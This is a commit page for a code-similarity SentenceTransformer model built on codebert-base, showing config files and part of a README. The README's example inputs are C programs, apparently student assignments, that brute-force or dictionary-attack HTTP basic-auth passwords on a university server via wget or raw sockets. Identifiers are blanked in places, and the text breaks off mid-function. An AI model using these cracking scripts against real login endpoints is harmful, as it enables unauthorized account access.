Add new SentenceTransformer model
Browse files- 1_Pooling/config.json +10 -0
- README.md +827 -0
- config.json +27 -0
- config_sentence_transformers.json +14 -0
- merges.txt +0 -0
- model.safetensors +3 -0
- modules.json +14 -0
- sentence_bert_config.json +4 -0
- special_tokens_map.json +51 -0
- tokenizer.json +0 -0
- tokenizer_config.json +58 -0
- vocab.json +0 -0
1_Pooling/config.json
ADDED
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"word_embedding_dimension": 768,
|
3 |
+
"pooling_mode_cls_token": false,
|
4 |
+
"pooling_mode_mean_tokens": true,
|
5 |
+
"pooling_mode_max_tokens": false,
|
6 |
+
"pooling_mode_mean_sqrt_len_tokens": false,
|
7 |
+
"pooling_mode_weightedmean_tokens": false,
|
8 |
+
"pooling_mode_lasttoken": false,
|
9 |
+
"include_prompt": true
|
10 |
+
}
|
README.md
ADDED
@@ -0,0 +1,827 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
---
|
2 |
+
tags:
|
3 |
+
- sentence-transformers
|
4 |
+
- sentence-similarity
|
5 |
+
- feature-extraction
|
6 |
+
- dense
|
7 |
+
- generated_from_trainer
|
8 |
+
- dataset_size:3081
|
9 |
+
- loss:BatchAllTripletLoss
|
10 |
+
base_model: microsoft/codebert-base
|
11 |
+
widget:
|
12 |
+
- source_sentence: "#include <sys/times.h>\n#include <strings.h>\n#include <string.h>\n\
|
13 |
+
#include <ctype.h>\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/times.h>\n\
|
14 |
+
#include <strings.h>\n#include <string.h>\n#include <ctype.h>\n#include <sys/time.h>\n\
|
15 |
+
#define ant 1e9\n\nint ()\n{\nchar c[2],[3][2];\nregister int i,j,k,x,y,z,t,r,s,final,count=0;\n\
|
16 |
+
int starttime,endtime,totaltime; \nchar ch[5],ch1[5],ch2[5],s1[100],s2[100];\n\
|
17 |
+
c[0]='A',c[1]='a';\n[0][1]=[1][1]=[2][1]='\\0';\n\nstrcpy(s1, \"wget --http-user=\
|
18 |
+
\ --http-passwd=\");\n strcpy(s2, \" http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
19 |
+
);\n\nstarttime=time();\n\nfor(r=0;r<=1;r++)\n{\n\t\n\tfor(i=c[r],x=0;x<=25;x++,i++)\n\
|
20 |
+
\t{\n\t\t\n\t\t [0][0]=i;\n\t\t strcpy(ch,[0]);\n\n\n\t\tfor(s=0;s<=1;s++)\n\t\
|
21 |
+
\t{\n\t\t\tfor(j=c[s],z=0;z<=25;z++,j++)\n\t\t\t{\t\n\t\t\n\t\t\t\t[1][0]=j;\n\
|
22 |
+
\t\t\t\tstrcpy(ch1,[0]);\n\t\t\t\tstrcat(ch1,[1]);\n\n\t\t\t\tfor(t=0;t<=1;t++)\n\
|
23 |
+
\t\t\t\t{\n\t\t\t\t\tfor(k=c[t],y=0;y<=25;y++,k++)\n\t\t\t\t\t{\tcount++;\n\t\t\
|
24 |
+
\t\t\t\t[2][0]=k;\n\t\t\t\t\t\tstrcpy(ch2,ch1);\n\t\t\t\t\t\tstrcat(ch2,[2]);\n\
|
25 |
+
\t\t\t\t\t\tprintf(\"\\n %s\",ch2);\n\n\n\n strcat(s1, ch2);\n \
|
26 |
+
\ strcat(s1, s2);\n\t printf(\"\\n combination sent %s\\n\", s1);\n \
|
27 |
+
\ final = system(s1);\n if (final == 0)\n {\n \
|
28 |
+
\ endtime=time();\n\t\ttotaltime=(endtime-starttime);\n\t\t printf(\"count %d\"\
|
29 |
+
,count);\n\t printf(\"totaltime %1f\",(double)totaltime/ant);\n\t printf(\"\
|
30 |
+
\\nsuccess %s\\n\",ch2);\n exit(1);\n }\n\n\n\t strcpy(s1,\
|
31 |
+
\ \"\");\n\t strcpy(s1, \"wget --http-user= --http-passwd=\");\n\n\n\t\t\t\t\
|
32 |
+
}\n\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\t }\n}\n\n}\n\n\n\n"
|
33 |
+
sentences:
|
34 |
+
- "\n\n\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n#include\
|
35 |
+
\ <time.h>\n#include <netdb.h>\n#include <unistd.h>\n#include <netinet/in.h>\n\
|
36 |
+
#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/time.h>\n#include\
|
37 |
+
\ <arpa/inet.h>\n#include <errno.h>\n#include <signal.h>\n\n#define BUFFER_SIZE\
|
38 |
+
\ 2000\n#define RETURN_OK 0\n#define RETURN_ERROR 1\n#define TRUE 1\n#define\
|
39 |
+
\ FALSE 0\n#define PASSWORD_LENGTH 3\n\n#define STATUS_OK 200\n#define\
|
40 |
+
\ STATUS_AUTH_REQUIRED 401\n#define CONN_CLOSED 2\n\n\nchar *host;\n\
|
41 |
+
char *filename;\nint ;\nchar *url;\nchar *username;\nint attempt;\nstruct sockaddr_in\
|
42 |
+
\ serverAddr;\n\n\nvoid processArguments(int, char **argv, char **, char **);\n\
|
43 |
+
void printUsage(char *);\nvoid splitURL(const char *, char **, char **);\nint\
|
44 |
+
\ openConnection();\nvoid initialiseConnection();\nvoid sendRequest(int, char\
|
45 |
+
\ *, char *, char *, char *);\nint getResponseStatus(int);\nvoid base64_encode(const\
|
46 |
+
\ unsigned char *, unsigned char *);\nvoid getHostErrorMsg(char *);\nvoid generatePassword(char\
|
47 |
+
\ *, int);\nvoid testPassword(char *);\n\n\n\n\nint main(int argc, char *argv[])\n\
|
48 |
+
{\n char password[PASSWORD_LENGTH+1];\n int i;\n\n \n\n attempt =\
|
49 |
+
\ 0;\n processArguments(argc, argv, &url, &username);\n splitURL(url, &host,\
|
50 |
+
\ &filename);\n\n initialiseConnection();\n = openConnection();\n\n \
|
51 |
+
\ \n\n for (i=1; i<=PASSWORD_LENGTH; i++)\n {\n memset(password,\
|
52 |
+
\ 0, PASSWORD_LENGTH+1);\n generatePassword(password, i);\n }\n\n \
|
53 |
+
\ printf(\"The password has not been cracked\\n\");\n exit(RETURN_OK);\n\n\
|
54 |
+
}\n\n\n\n\nvoid generatePassword(char *password, int reqLength)\n{\n static\
|
55 |
+
\ const char *chars = \n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\
|
56 |
+
;\n\n int currLength;\n int i;\n\n currLength = strlen(password);\n \
|
57 |
+
\ currLength++;\n\n for (i=0; i<strlen(chars); i++)\n {\n password[currLength-1]\
|
58 |
+
\ = chars[i];\n\n if (strlen(password) != reqLength)\n {\n \
|
59 |
+
\ \n generatePassword(password, reqLength);\n }\n \
|
60 |
+
\ else\n {\n testPassword(password);\n }\n\n password[currLength]\
|
61 |
+
\ = '\\0';\n }\n}\n\n\n\n\nvoid testPassword(char *password)\n{\n int status;\n\
|
62 |
+
\n attempt++;\n\n \nTestPassword:\n sendRequest(, host, filename, username,\
|
63 |
+
\ password);\n status = getResponseStatus();\n\n if (status == STATUS_OK)\n\
|
64 |
+
\ {\n printf(\"The password has been found after %d attempts: %s\\n\"\
|
65 |
+
,\n attempt, password);\n exit(RETURN_OK);\n }\n else\
|
66 |
+
\ if (status == CONN_CLOSED)\n {\n \n ();\n = openConnection();\n\
|
67 |
+
\ goto TestPassword; \n }\n else if (status != STATUS_AUTH_REQUIRED)\n\
|
68 |
+
\ {\n printf(\"Status %d received from server\\n\", status);\n \
|
69 |
+
\ exit(RETURN_ERROR);\n }\n\n}\n\n\n\n\nvoid processArguments(int argc, char\
|
70 |
+
\ *argv[], char **url, char **username)\n{\n if (argc != 3)\n {\n \
|
71 |
+
\ printUsage(argv[0]);\n exit(1);\n }\n\n *url = (char *) malloc(strlen(argv[1]\
|
72 |
+
\ + 1));\n strcpy(*url, argv[1]);\n\n *username = (char *) malloc(strlen(argv[2]\
|
73 |
+
\ + 1));\n strcpy(*username, argv[2]);\n\n}\n\n\n\n\n\nvoid printUsage(char\
|
74 |
+
\ *program)\n{\n fprintf(stderr, \"Usage:\\n\");\n fprintf(stderr, \"%s\
|
75 |
+
\ url username\\n\", program);\n}\n\n\n\n\nvoid splitURL(const char *url, char\
|
76 |
+
\ **host, char **file)\n{\n char *p1; \n char *p2;\n\n \n p1 = strstr(url,\
|
77 |
+
\ \"//\");\n if (p1 == NULL)\n p1 = (char *) url;\n else\n \
|
78 |
+
\ p1 = p1 + 2;\n\n \n p2 = strstr(p1, \"/\");\n if (p2 == NULL)\n \
|
79 |
+
\ {\n fprintf(stderr, \"Invalid url\\n\");\n exit(RETURN_ERROR);\n\
|
80 |
+
\ }\n\n *host = (char *) malloc(p2-p1+2);\n strncpy(*host, p1, p2-p1);\n\
|
81 |
+
\ (*host)[p2-p1] = '\\0';\n\n *file = (char *) malloc(strlen(p2+1));\n \
|
82 |
+
\ strcpy(*file, p2);\n\n}\n\n\n\n\nvoid sendRequest(int , char *host, char *filename,\
|
83 |
+
\ char *username, \n char *password)\n{\n char message[BUFFER_SIZE];\n\
|
84 |
+
\ unsigned char encoded[BUFFER_SIZE];\n unsigned char token[BUFFER_SIZE];\n\
|
85 |
+
\n \n\n \n sprintf((char *) token, \"%s:%s\", username, password);\n\
|
86 |
+
\ base64_encode(token, encoded);\n\n sprintf(message, \"GET %s HTTP/1.1\\\
|
87 |
+
nHost: %s\\nAuthorization: %s\\n\\n\",\n filename, host, encoded);\n\
|
88 |
+
\n if (write(, message, strlen(message)) == -1)\n {\n perror(\"\"\
|
89 |
+
);\n exit(RETURN_ERROR);\n }\n}\n\n\n\n\nint getResponseStatus()\n{\n\
|
90 |
+
\ char message[BUFFER_SIZE];\n int bytesRead;\n char *p1;\n char\
|
91 |
+
\ status_str[4];\n int status;\n\n \n\n while (TRUE)\n {\n \
|
92 |
+
\ bytesRead = (, message, BUFFER_SIZE-1);\n if (bytesRead == -1)\n \
|
93 |
+
\ {\n perror(\"\");\n exit(RETURN_ERROR);\n }\n\
|
94 |
+
\ else if (bytesRead == 0)\n {\n \n return\
|
95 |
+
\ CONN_CLOSED;\n }\n\n message[bytesRead+1] = '\\0';\n\n \
|
96 |
+
\ \n p1 = strstr(message, \"HTTP\");\n if (p1 != NULL)\n \
|
97 |
+
\ {\n p1 = p1 + 9;\n break;\n }\n }\n\n strncpy(status_str,\
|
98 |
+
\ p1, 3);\n status_str[3] = '\\0';\n status = atol(status_str);\n\n return\
|
99 |
+
\ status;\n}\n\n\n\n\nint openConnection()\n{\n int ;\n\n if (( = socket(AF_INET,\
|
100 |
+
\ SOCK_STREAM, 0)) == -1)\n {\n perror(\"\");\n exit(RETURN_ERROR);\n\
|
101 |
+
\ }\n\n if (connect(, (struct sockaddr *) &serverAddr, sizeof(serverAddr))\
|
102 |
+
\ == -1)\n {\n perror(\"connect\");\n exit(RETURN_ERROR);\n \
|
103 |
+
\ }\n\n return ;\n}\n\n\n\n\nvoid initialiseConnection()\n{\n struct hostent\
|
104 |
+
\ *serverHostent;\n unsigned serverIP;\n char errorMsg[BUFFER_SIZE]; \n\
|
105 |
+
\n\n \n\n memset(&serverAddr, 0, sizeof(serverAddr));\n serverAddr.sin_port\
|
106 |
+
\ = htons(80);\n\n\n if ((serverIP = inet_addr(host)) != -1)\n {\n \
|
107 |
+
\ serverAddr.sin_family = AF_INET;\n serverAddr.sin_addr.s_addr = serverIP;\n\
|
108 |
+
\ }\n else if ((serverHostent = gethostbyname(host)) != NULL)\n {\n\t\
|
109 |
+
serverAddr.sin_family = serverHostent->h_addrtype;\n memcpy((void *) &serverAddr.sin_addr,\n\
|
110 |
+
\t\t (void *) serverHostent->h_addr, serverHostent->h_length);\n }\n else\n\
|
111 |
+
\ {\n getHostErrorMsg(errorMsg);\n printf(\"%s: %s\\n\", host,\
|
112 |
+
\ errorMsg);\n exit(RETURN_ERROR);\n }\n}\n\n\n\n \nvoid base64_encode(const\
|
113 |
+
\ unsigned char *input, unsigned char *output)\n{\n static const char *codes\
|
114 |
+
\ = \n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\
|
115 |
+
;\n\n int i;\n int len;\n int lenfull;\n unsigned char *p;\n int\
|
116 |
+
\ a;\n int b;\n int c;\n \n p = output;\n len = strlen((char *)\
|
117 |
+
\ input);\n\n \n\n lenfull = 3*(len / 3);\n for (i = 0; i < lenfull;\
|
118 |
+
\ i += 3) \n {\n *p++ = codes[input[0] >> 2];\n *p++ = codes[((input[0]\
|
119 |
+
\ & 3) << 4) + (input[1] >> 4)];\n *p++ = codes[((input[1] & 0xf) << 2)\
|
120 |
+
\ + (input[2] >> 6)];\n *p++ = codes[input[2] & 0x3f];\n input +=\
|
121 |
+
\ 3;\n }\n\n\n \n\n if (i < len)\n {\n a = input[0];\n \
|
122 |
+
\ b = (i+1 < len) ? input[1] : 0;\n c = 0;\n\n *p++ = codes[a\
|
123 |
+
\ >> 2];\n *p++ = codes[((a & 3) << 4) + (b >> 4)];\n *p++ = (i+1\
|
124 |
+
\ < len) ? codes[((b & 0xf) << 2) + (c >> 6)] : '=';\n *p++ = '=';\n \
|
125 |
+
\ }\n\n \n *p = '\\0';\n \n}\n\n\n\n\nvoid getHostErrorMsg(char *message)\n\
|
126 |
+
{\n switch (h_errno)\n {\n HOST_NOT_FOUND :\n strcpy(message,\
|
127 |
+
\ \"The specified host is unknown\");\n break;\n\n NO_DATA:\n\
|
128 |
+
\ strcpy(message, \"The specified host name is valid, but does not\
|
129 |
+
\ have address\");\n break;\n\n NO_RECOVERY:\n \
|
130 |
+
\ strcpy(message, \"A non-recoverable name server error occurred\");\n \
|
131 |
+
\ break;\n\n TRY_AGAIN:\n strcpy(message, \"A temporary\
|
132 |
+
\ error occurred authoritative name server. Try again later.\");\n \
|
133 |
+
\ break;\n\n default:\n strcpy(message, \" unknown name\
|
134 |
+
\ server error occurred.\");\n }\n}\n\n"
|
135 |
+
- "# include <stdlib.h>\n# include <stdio.h>\n# include <strings.h>\n\n\nint ()\n\
|
136 |
+
{\n\t\n\tFILE* fpp;\t\t\t\t\t\t\t\t\t\t\n\tFILE* fp;\n\t\t\t\n\tchar s[100];\n\
|
137 |
+
\tint i;\n\t\n\twhile(1)\t\t\t\t\t\t\t\t\t\t\n\t{\n\t\tsystem(\"wget -nv http://www.cs.rmit.edu./students\"\
|
138 |
+
);\t\t\t\t\n\t\t\n\t\ti=0;\t\t\n\t\t\n\t\tfp = fopen(\"dummyindex.txt\",\"r\"\
|
139 |
+
);\n\t\t\n\t\tif(fp == (FILE*) NULL)\t\t\t\t\t\t\t\t\n\t\t{\n\t\t\tprintf(\" is\
|
140 |
+
\ previously saved webpage in the file\\n\");\n\t\t\ti=1;\n\t\t\tfp = fopen(\"\
|
141 |
+
dummyindex.txt\",\"w\");\n\n\t\t}\n\t\t\t\t\n\t\tfclose(fp);\n\t\t\n\t\t\t\t\n\
|
142 |
+
\t\t\n\t\t\n\t\t\n\t\tsystem(\"diff index.html dummyindex.txt > compareoutput.txt\"\
|
143 |
+
);\t\t\n\n\t\t\t\t\n\t\tif(fpp != (FILE*) NULL)\t\n\t\t{\n\t\t\t\n\t\t\tfpp =\
|
144 |
+
\ fopen(\"compareoutput.txt\",\"r\");\t\t\t\t\t\n\t\t\t\n\t\t\tfgets(s,100,fpp);\t\
|
145 |
+
\t\t\t\t\t\t\n\t\t\t\n\t\t\tfclose(fpp);\t\t\t\t\t\t\t\t\n\t\t\n\t\t\n\t\t \n\
|
146 |
+
\t\t\tif((strlen(s)>0) && i==0)\t\t\t\t\t\t\t\t\n\t\t\t{\n\t\t\t\tsystem(\"mail\
|
147 |
+
\ @cs.rmit.edu. < compareoutput.txt\");\t\n\t\t\t\tsystem(\"cp index.html dummyindex.txt\"\
|
148 |
+
);\t\t\t\t\n\t\t\t\tprintf(\"Message has been sent\\n\");\t\t\t\t\n\t\t\t}\n\t\
|
149 |
+
\t\telse\n\t\t\t\tprintf(\" is change in the \\n\");\t\t\t\n\t\t}\n\t\t\n\t\t\
|
150 |
+
\n\n\t\tsystem(\"rm index.html\")\t;\t\t\t\t\n\t\t\n\t\tsleep(86400);\t\t\t\t\t\
|
151 |
+
\t\t\t\t\n\t}\n\t\t\t\t\n\treturn 1;\n}\n"
|
152 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<strings.h>\n#include<ctype.h>\n\
|
153 |
+
#include <sys/time.h>\n#define OneBillion 1e9\n\nint ()\n{ int startTime, stopTime,\
|
154 |
+
\ final;\n int i,j,k;\n FILE* fp;\n int pass,len;\n int count = 0;\n\
|
155 |
+
\ char [50];\n char url1[100];\n char url2[100];\n\n startTime = time();\n\
|
156 |
+
\ fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n while (fp !='\\0')\n\
|
157 |
+
\ {\n fgets( ,50,fp);\n\n len = strlen();\n [strlen()-1]\
|
158 |
+
\ ='\\0';\n\n if(len <= 4)\n {\n count++;\n\t printf(\"\
|
159 |
+
Checking for the word :%s\\n\",);\n\t strcpy(url1 ,\"wget --http-user= --http-passwd=\"\
|
160 |
+
);\n\t strcat(url1,);\n\t strcpy(url2 , \" -nv -o output http://sec-crack.cs.rmit.edu./SEC/2/\
|
161 |
+
\ \");\n\t strcat(url1,url2);\n\n\n\t pass = system(url1);\n\t if (pass\
|
162 |
+
\ == 0)\n\t {\n\t stopTime = time();\n final = stopTime-startTime;\n\
|
163 |
+
\t printf(\"\\n SUCCESS\\n\");\n\t printf(\"The password for the user\
|
164 |
+
\ : %s\\n \",);\n\t printf(\"Found the password in %lld nanoseconds (%1f\
|
165 |
+
\ seconds) \\n\",final,(double)final/OneBillion);\n\t printf(\"Number of\
|
166 |
+
\ attempts : %d\\n\",count);\n exit(1);\n\t }\n }\n }\n\n\
|
167 |
+
\ }\n"
|
168 |
+
- source_sentence: "\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n\
|
169 |
+
#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar\
|
170 |
+
\ a[100];\nint count=0;\nchar ch;\nchar line[100];\nchar filename[50];\nchar *token;\n\
|
171 |
+
const char delimiter[]=\" \\n.,;:!-\";\nFILE *fp;\nint total_time,start_time,end_time;\n\
|
172 |
+
start_time = time();\nstrcpy(filename,\"/usr/share/lib/dict/words\");\nif((fp=fopen(filename,\"\
|
173 |
+
r\"))==NULL){\nprintf(\"cannot open file\\n\");\nexit(1);\n}\nwhile((fgets(line,sizeof(line),fp))!=NULL)\n\
|
174 |
+
{\n token=strtok(line,delimiter); \n while(token!=NULL)\n \
|
175 |
+
\ {\n count++;\n\t printf(\"ATTEMPT : %d\\n\",count);\n\
|
176 |
+
strcpy(a,\"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=\"\
|
177 |
+
);\n strcat(a,token); \n printf(\"\
|
178 |
+
The request %s\\n\",a); \n if(system(a)==0)\n\t\t{\n\t\tprintf(\"\
|
179 |
+
Congratulations!!!Password obtained using DICTIONARY ATTACK\\n\");\n\t\tprintf(\"\
|
180 |
+
************************************************************\\n\");\n\t\tprintf(\"\
|
181 |
+
Your password is %s\\n\",token);\n\t\tprintf(\"The Request sent is %s \\n\",a);\n\
|
182 |
+
\ end_time = time();\n total_time = (end_time -start_time);\n\
|
183 |
+
\ total_time /= 1000000000.0;\n printf(\"The Time\
|
184 |
+
\ Taken is : %llds\\n\",total_time);\n\t\texit(1);\n\t\t}\n\n \n\
|
185 |
+
\ token=strtok(NULL,delimiter);\n \n \
|
186 |
+
\ }\n}\n\n\nfclose(fp);\nreturn 0;\n}\n"
|
187 |
+
sentences:
|
188 |
+
- "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <unistd.h>\n\
|
189 |
+
\t\t\t\t \n\n\n#define USERNAME \"\"\n#define URL \"sec-crack.cs.rmit.edu./SEC/2\"\
|
190 |
+
\n#define TEST_URL \"yallara.cs.rmit.edu./~/secure\"\n#define MAX_PASSWD_LEN 3\n\
|
191 |
+
#define MAX_CHAR_SET 52\n\n#define TRUE 1\n#define FALSE 0\n\n\n\n\n\n\n\n\ntypedef\
|
192 |
+
\ int (*CrackFuncPtr)(const char*, const char*);\n\nint runBruteForce(const char\
|
193 |
+
\ chSet[], int numOfCh, int len, CrackFuncPtr func);\nchar* initPasswdStr(int\
|
194 |
+
\ len, char ch);\nint getChPos(const char chSet[], int numOfCh, char ch);\nint\
|
195 |
+
\ pow(int x, int y);\nint crackHTTPAuth(const char *username, const char *passwd);\n\
|
196 |
+
\nint ()\n{\n\tchar charSet[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\
|
197 |
+
\ 'J', 'K',\n\t\t\t\t\t\t\t'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\
|
198 |
+
\ \n\t\t\t\t\t\t\t'W', 'X', 'Y', 'Z',\n\t\t\t\t\t\t\t'a', 'b', 'c', 'd', 'e',\
|
199 |
+
\ 'f', 'g', 'h', 'i', 'j', 'k',\n\t\t\t\t\t\t\t'l', 'm', 'n', 'o', 'p', 'q', 'r',\
|
200 |
+
\ 's', 't', 'u', 'v', \n\t\t\t\t\t\t\t'w', 'x', 'y', 'z'};\n\t\n\tchar charSetS[]\
|
201 |
+
\ = {'A', 'B', 'C'};\n\n\tint i; \n\t\n\tfor (i=1; i<=MAX_PASSWD_LEN; i++)\n\t\
|
202 |
+
{\n\t\tif (runBruteForce(charSet, MAX_CHAR_SET, i, crackHTTPAuth))\n\t\t{\n\t\t\
|
203 |
+
\treturn 0;\n\t\t}\n\t}\n\n\tprintf(\"\\n...password not found\\n\");\t\t\t\t\t\
|
204 |
+
\t\t \t\n\treturn 0;\n}\n\nint runBruteForce(const char chSet[], int numOfCh,\
|
205 |
+
\ int len, CrackFuncPtr func)\n{\n\tint iter; \n\tint chIter; \n\tint curPos =\
|
206 |
+
\ 0; \n\t\n\tchar *str;\n\t\n\tint passwdFound = FALSE;\n\t\n\tstr = initPasswdStr(len,\
|
207 |
+
\ chSet[0]);\n\n\tprintf(\"\\nNow trying %d character(s)\\n\", len);\n\n\n\tfor\
|
208 |
+
\ (iter=0; iter<pow(numOfCh, len)&&!passwdFound; iter++)\n\t{\n\t\tfor (chIter=len-1;\
|
209 |
+
\ chIter>=0; chIter--)\n\t\t{\n\t\t\tif (iter % pow(numOfCh, chIter) == 0) \n\t\
|
210 |
+
\t\t{\n\t\t\t\tcurPos = getChPos(chSet, numOfCh, str[chIter]);\n\t\t\t\tstr[chIter]\
|
211 |
+
\ = chSet[curPos+1];\n\t\t\t}\n\n\t\t\tif (iter % pow(numOfCh, (chIter+1)) ==\
|
212 |
+
\ 0) \n\t\t\t{\n\t\t\t\tstr[chIter] = chSet[0];\n\t\t\t}\n\t\t}\n\t\t\n\t\tif\
|
213 |
+
\ (func(USERNAME, str))\n\t\t{\n\t\t\tprintf(\"\\nPassword found: %s\\n\", str);\n\
|
214 |
+
\t\t\tpasswdFound = TRUE;\n\t\t}\n\n\t\t\n\t\tprintf(\".\");\n\t\t\t\t\t\n\t}\n\
|
215 |
+
\n\t(str);\n\tstr = NULL;\n\n\treturn passwdFound;\n}\n\nint getChPos(const char\
|
216 |
+
